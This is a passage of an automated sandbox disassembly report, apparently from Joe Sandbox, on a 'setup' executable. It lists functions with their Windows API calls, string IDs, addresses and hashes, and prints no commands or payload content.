                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorLastProcess$Init_thread_footer$CloseCodeCreateExitHandleHeapObjectSingleWait
                                                                                                                                                                              • String ID: "%s" %s$D
                                                                                                                                                                              • API String ID: 2023784982-3971972636
                                                                                                                                                                              • Opcode ID: 740596377933abbc71499c318dd097bbb9ab770d0c7a3c01bb5f943584e1fab3
                                                                                                                                                                              • Instruction ID: ee403600ccab3c6a50b0a4edd296526118e5ae7c944df42923b817f7d6a43f4a
                                                                                                                                                                              • Opcode Fuzzy Hash: 740596377933abbc71499c318dd097bbb9ab770d0c7a3c01bb5f943584e1fab3
                                                                                                                                                                              • Instruction Fuzzy Hash: B051E571904205DFDB10CF69CC44B6EB7F5FF8A724F2447A9E416A7690DB70A885CBA0
                                                                                                                                                                              Function 00BD50A0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 124windowstringCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(?,0000043A,00000000,00000074), ref: 00BD5115
                                                                                                                                                                              • lstrcpynW.KERNEL32(?,?,00000020), ref: 00BD518B
                                                                                                                                                                              • GetDC.USER32(?), ref: 00BD51AE
                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000), ref: 00BD51B5
                                                                                                                                                                              • MulDiv.KERNEL32(?,00000048,00000000), ref: 00BD51C8
                                                                                                                                                                              • SendMessageW.USER32(?,00000444,00000000,00000074), ref: 00BD51FA
                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 00BD5236
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$CapsDeleteDeviceObjectlstrcpyn
                                                                                                                                                                              • String ID: ?$t
                                                                                                                                                                              • API String ID: 2619291461-1995845436
                                                                                                                                                                              • Opcode ID: 68ddcc437193423147d9d725853a1c404ba24644e8582ede5c7fa22986f708c1
                                                                                                                                                                              • Instruction ID: a210eb1e1684683b4dc2c1b2700301ff3bd663ae7a086e502c4cfd5246f2fe56
                                                                                                                                                                              • Opcode Fuzzy Hash: 68ddcc437193423147d9d725853a1c404ba24644e8582ede5c7fa22986f708c1
                                                                                                                                                                              • Instruction Fuzzy Hash: 9F514C71508740AFE721DF61DC49B9BBBE8EB48701F00492EF699E6291E774A508CB62
                                                                                                                                                                              Function 00BB6B00 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 119COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(00EA699C,02141699,00000000,?,?,?,?,?,?,00BB632E,00DAB45D,000000FF), ref: 00BB6B3D
                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00BB6BB8
                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00BB6C5E
                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(00EA699C), ref: 00BB6CB3
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalCursorLoadSection$EnterLeave
                                                                                                                                                                              • String ID: v$AtlAxWin140$AtlAxWinLic140$WM_ATLGETCONTROL$WM_ATLGETHOST
                                                                                                                                                                              • API String ID: 3727441302-4127849342
                                                                                                                                                                              • Opcode ID: ef574327c052801ff36cc9b966d51d2b8b2098062b6490566f3731ea32de6f4c
                                                                                                                                                                              • Instruction ID: ea7993f295b3026148d952e67481dbb2ad69d9be38a51eac408fac067267e119
                                                                                                                                                                              • Opcode Fuzzy Hash: ef574327c052801ff36cc9b966d51d2b8b2098062b6490566f3731ea32de6f4c
                                                                                                                                                                              • Instruction Fuzzy Hash: BB51F4B1C01218AFDB11CFA5D855BEEBBF8FB09314F14026AE504F7291DBB55A49CBA0
                                                                                                                                                                              Function 00C5F860 Relevance: 15.1, APIs: 10, Instructions: 127windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • IsWindowVisible.USER32(?), ref: 00C5F8DA
                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00C5F8F2
                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00C5F90A
                                                                                                                                                                              • IntersectRect.USER32(?,?,?), ref: 00C5F927
                                                                                                                                                                              • EqualRect.USER32(?,?), ref: 00C5F937
                                                                                                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 00C5F94D
                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00C5F976
                                                                                                                                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 00C5F98B
                                                                                                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 00C5F99A
                                                                                                                                                                              • SetBrushOrgEx.GDI32(?,?,?,00000000), ref: 00C5F9B8
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$Rect$Brush$ColorEqualIntersectLongPointsVisible
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2158939716-0
                                                                                                                                                                              • Opcode ID: 8c5982361d4da97242dd53da88d700685129050eaab000f896c86d3c0836f652
                                                                                                                                                                              • Instruction ID: 2db0677c207b94138389c5ef18455593bfa45516bd5ce843f68c1d61a3d42220
                                                                                                                                                                              • Opcode Fuzzy Hash: 8c5982361d4da97242dd53da88d700685129050eaab000f896c86d3c0836f652
                                                                                                                                                                              • Instruction Fuzzy Hash: 1E418F366083059FC710DF25D844A5BB7E8FF99715F05462EF989E3250EB30EE898B62
                                                                                                                                                                              Function 00BBA7F0 Relevance: 15.1, APIs: 10, Instructions: 95windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetDC.USER32(?), ref: 00BBA831
                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00BBA858
                                                                                                                                                                              • CreateCompatibleDC.GDI32(?), ref: 00BBA868
                                                                                                                                                                              • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00BBA889
                                                                                                                                                                              • DeleteDC.GDI32(00000000), ref: 00BBA896
                                                                                                                                                                              • FillRect.USER32(?,?,00000006), ref: 00BBA8DA
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CompatibleCreateRect$BitmapClientDeleteFill
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1262984673-0
                                                                                                                                                                              • Opcode ID: 84e125e8a04242f15bcc06d4cd3c7a4217796b73c192d23655c206c3ce0d5d98
                                                                                                                                                                              • Instruction ID: 26668fd3d1104cbf65bf56cedf4854e42f0708d1f8843b39e1364e2d7fa8a421
                                                                                                                                                                              • Opcode Fuzzy Hash: 84e125e8a04242f15bcc06d4cd3c7a4217796b73c192d23655c206c3ce0d5d98
                                                                                                                                                                              • Instruction Fuzzy Hash: CC31C3715043019FC715DF29DC88B6BBBE8FF98304F51086EF886D2161DBB18849CB62
                                                                                                                                                                              Function 00D8AA27 Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 487COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: __aulldiv
                                                                                                                                                                              • String ID: :$f$f$f$p$p$p
                                                                                                                                                                              • API String ID: 3732870572-1434680307
                                                                                                                                                                              • Opcode ID: 13fd1634278424a41929ed8b2686992aaa1bff08d1fa4f0ef282b0c7c302f536
                                                                                                                                                                              • Instruction ID: 241fc3534a01892f4eee872c5ee23e96d50ffbaad4f3d7210d73c74e5cc4a89f
                                                                                                                                                                              • Opcode Fuzzy Hash: 13fd1634278424a41929ed8b2686992aaa1bff08d1fa4f0ef282b0c7c302f536
                                                                                                                                                                              • Instruction Fuzzy Hash: A202A4B5A002189BEF24AF6CC4446EEB7B6FF40B14F648117E555BB284D3348E85CB76
                                                                                                                                                                              Function 00D06BA0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 178fileCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00BAACF0: GetProcessHeap.KERNEL32 ref: 00BAAD45
                                                                                                                                                                                • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAD77
                                                                                                                                                                                • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAE02
                                                                                                                                                                                • Part of subcall function 00BAA2A0: FindResourceW.KERNEL32(00000000,?,00000006,?,?,*.*,8007000E,80004005,00BC2B04,00000000,?,?,?,*.*,?,80070057), ref: 00BAA2C3
                                                                                                                                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,ps1,ps1,00000003,?,00CE41D8), ref: 00D06C93
                                                                                                                                                                              • WriteFile.KERNEL32(00000000,0000FEFF,00000002,?,00000000), ref: 00D06CD7
                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 00D06CF4
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00D06D0E
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00000000,00000000), ref: 00D06D4D
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: File$CloseHandleInit_thread_footerWrite$CreateFindHeapProcessResource
                                                                                                                                                                              • String ID: Unable to get temp file $Unable to save script file $ps1
                                                                                                                                                                              • API String ID: 2821137686-4253966538
                                                                                                                                                                              • Opcode ID: 6c9660a3a9e301bf31babc46b513d9d70276ac6f0446ad761ba1e1468d4727b5
                                                                                                                                                                              • Instruction ID: f6c0de0f981807cfcf1d72f0bb8cc58eca8a161cdef5719ca9c505efdde5e4fb
                                                                                                                                                                              • Opcode Fuzzy Hash: 6c9660a3a9e301bf31babc46b513d9d70276ac6f0446ad761ba1e1468d4727b5
                                                                                                                                                                              • Instruction Fuzzy Hash: 8F51E570A00209AFDB10DBA4CD09BDEBBB8EF05714F244258E914BB2D1D775DA44CBB4
                                                                                                                                                                              Function 00DA5D0C Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 147COMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,00DA6A8F), ref: 00DA5D25
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: DecodePointer
                                                                                                                                                                              • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                                                                              • API String ID: 3527080286-3064271455
                                                                                                                                                                              • Opcode ID: 6927eced9568d4df06011290e6af586427bcf2fae3c8fd1f066cfa899e40d79e
                                                                                                                                                                              • Instruction ID: bb646341c9ea3871632eec7fe4c14a6b8fe9cd46edea008f145901a0de98a148
                                                                                                                                                                              • Opcode Fuzzy Hash: 6927eced9568d4df06011290e6af586427bcf2fae3c8fd1f066cfa899e40d79e
                                                                                                                                                                              • Instruction Fuzzy Hash: 53517B74900A0ACBCF109F98F94D1EDBFB4FB4A300F194145E481AA668CB758BA9CB64
                                                                                                                                                                              Function 00D83AD0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 132COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00D83B07
                                                                                                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00D83B0F
                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00D83B98
                                                                                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00D83BC3
                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00D83C18
                                                                                                                                                                              • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00D83C2E
                                                                                                                                                                              • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00D83C43
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record___vcrt_initialize_locks___vcrt_uninitialize_locks
                                                                                                                                                                              • String ID: csm
                                                                                                                                                                              • API String ID: 1385549066-1018135373
                                                                                                                                                                              • Opcode ID: fbb38c5405b2e916ed7c302bfea53d12b51c5948550900351d8969b396b45fb0
                                                                                                                                                                              • Instruction ID: cdfbb499ba0710106f8a3762a2a972c311f12dcbf11035e811d52a4a820a3e2b
                                                                                                                                                                              • Opcode Fuzzy Hash: fbb38c5405b2e916ed7c302bfea53d12b51c5948550900351d8969b396b45fb0
                                                                                                                                                                              • Instruction Fuzzy Hash: 0F41D474A002099FCF10FF68C885AAEBBB5EF45724F148155E818AB392D771EA15CBB1
                                                                                                                                                                              Function 00BA97E0 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 240COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00BA98C5
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00BA9910
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Init_thread_footer
                                                                                                                                                                              • String ID: </a>$<a href="$<a>$Hi$Hi
                                                                                                                                                                              • API String ID: 1385522511-4214971700
                                                                                                                                                                              • Opcode ID: a4f773395ba7438b115bf6df43c42c5c2e22a01b054005730af75cb266286c35
                                                                                                                                                                              • Instruction ID: 755e41ccc0fc7f1435105e77e529ef2c140ed1b2ea9c6c91a84cc23daabd0706
                                                                                                                                                                              • Opcode Fuzzy Hash: a4f773395ba7438b115bf6df43c42c5c2e22a01b054005730af75cb266286c35
                                                                                                                                                                              • Instruction Fuzzy Hash: 4BA1A070A04708DFCB14DF64C945BAEB7F1FF8A314F144299E426AB2D1EB70A949CB61
                                                                                                                                                                              Function 00CCD460 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 166synchronizationCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • ShellExecuteExW.SHELL32(0000003C), ref: 00CCD5D6
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00CCD5E7
                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00CCD603
                                                                                                                                                                              • GetExitCodeProcess.KERNEL32(00000000,00DEC257), ref: 00CCD614
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00CCD622
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CloseCodeErrorExecuteExitHandleLastObjectProcessShellSingleWait
                                                                                                                                                                              • String ID: <$open
                                                                                                                                                                              • API String ID: 1481985272-1930408713
                                                                                                                                                                              • Opcode ID: 53f4dbba0f3d9ef10770691c98113cd96883f243b78f52e658e415e506c3b317
                                                                                                                                                                              • Instruction ID: 7a4664adff44436ecd280edf3a77af4b7cd417cd649dc9c9d44bd9831990049c
                                                                                                                                                                              • Opcode Fuzzy Hash: 53f4dbba0f3d9ef10770691c98113cd96883f243b78f52e658e415e506c3b317
                                                                                                                                                                              • Instruction Fuzzy Hash: D4616AB1D006499FDB10CFA9C844B9EBBB4FF49324F14826DE826AB391D7759E44CB90
                                                                                                                                                                              Function 00BBA130 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 151threadCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • SetLastError.KERNEL32(0000000E,02141699,?,?,00000000,?), ref: 00BBA16E
                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00BBA1AF
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(00EA699C), ref: 00BBA1CF
                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(00EA699C), ref: 00BBA1F3
                                                                                                                                                                              • CreateWindowExW.USER32(00000000,00000000,00000000,00EA699C,?,80000000,00000000,80000000,00000000,00000000,00000000), ref: 00BBA24E
                                                                                                                                                                                • Part of subcall function 00D7F902: GetProcessHeap.KERNEL32(00000008,00000008,?,00BB83B7,?,?,00BB8164,?), ref: 00D7F907
                                                                                                                                                                                • Part of subcall function 00D7F902: HeapAlloc.KERNEL32(00000000,?,?,00BB8164,?), ref: 00D7F90E
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalHeapSection$AllocCreateCurrentEnterErrorLastLeaveProcessThreadWindow
                                                                                                                                                                              • String ID: v$AXWIN UI Window
                                                                                                                                                                              • API String ID: 213679520-2690018532
                                                                                                                                                                              • Opcode ID: 926621ac5943f116de6fe0cef5eb505d47df0b18f25916eedb46637d19e05d30
                                                                                                                                                                              • Instruction ID: 85a2330f8fc84fe8f071a45121e54732a2bd6733231311ce1bbaffd3c28817a8
                                                                                                                                                                              • Opcode Fuzzy Hash: 926621ac5943f116de6fe0cef5eb505d47df0b18f25916eedb46637d19e05d30
                                                                                                                                                                              • Instruction Fuzzy Hash: B151B571A00345EFDB10DF59DD05BAABBF4FB89B14F10825AF904B7290D7B2A814CBA1
                                                                                                                                                                              Function 00BBE180 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 150fileCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00BBE26F
